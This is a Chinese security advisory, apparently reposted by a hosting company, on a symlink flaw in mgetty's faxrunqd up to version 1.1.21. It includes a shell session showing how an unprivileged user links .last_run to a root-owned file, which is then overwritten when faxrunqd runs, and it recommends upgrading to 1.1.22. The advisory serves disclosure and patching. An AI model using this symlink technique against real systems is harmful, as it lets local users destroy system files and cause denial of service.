Linux faxrunqd文件创建问题导致拒绝服务攻击
受影响系统: mgetty 1.1.21以及更低版本 - Linux redhat 6.2以及更低版本 - Linux-Mandrake 7.1 以及更低版本 - 其他使用有问题mgetty的unix系统 不受影响系统: mgetty 1.1.22 描述: mgetty中带了一个faxrunqd程序,它用来发送faxspool(1)产生的传真队列中的任务. 在执行时,该程序会在/var/spool/outgoing/目录下创建一个.last_run文件,这个 目录是任何人可写的.在某些mgetty版本中所带的faxrunqd没有检查该文件是否存在 或是链接文件,因此攻击者可能覆盖任意系统文件,造成拒绝服务攻击. <* 来源: Stan Bubrouski (satan@fastdial.net)*> 测试方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负! [user@king /tmp]$ id uid=200(user) gid=100(users) groups=100(users) [user@king /tmp]$ ls -al /var/spool/fax/outgoing total 3 drwxrwxrwt 3 root root 1024 Jun 2 18:46 . drwxr-xr-x 4 root root 1024 Jun 2 18:46 .. drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks [user@king /tmp]$ ls -al /etc/smash_me -rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me [user@king /tmp]$ cat /etc/smash_me Smash me!!! [user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run [user@king /tmp]$ ls -al /var/spool/fax/outgoing total 3 drwxrwxrwt 3 root root 1024 Jun 2 18:48 . drwxr-xr-x 4 root root 1024 Jun 2 18:46 .. lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run -> /etc/smash_me drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks Root console: [root@king /tmp]# faxrunqd -l ttyS0 ... Remote unprivilaged user: [user@king /tmp]$ ls -al /var/spool/fax/outgoing total 3 drwxrwxrwt 3 root root 1024 Jun 2 18:48 . drwxr-xr-x 4 root root 1024 Jun 2 18:48 .. lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run -> /etc/smash_me drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks [user@king /tmp]$ ls -al /etc/smash_me -rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me [user@king /tmp]$ cat /etc/smash_me Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd 建议: mgetty 1.1.22已经解决了这个问题,您可以在下列地址下载: http://alpha.greenie.net/mgetty/ |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
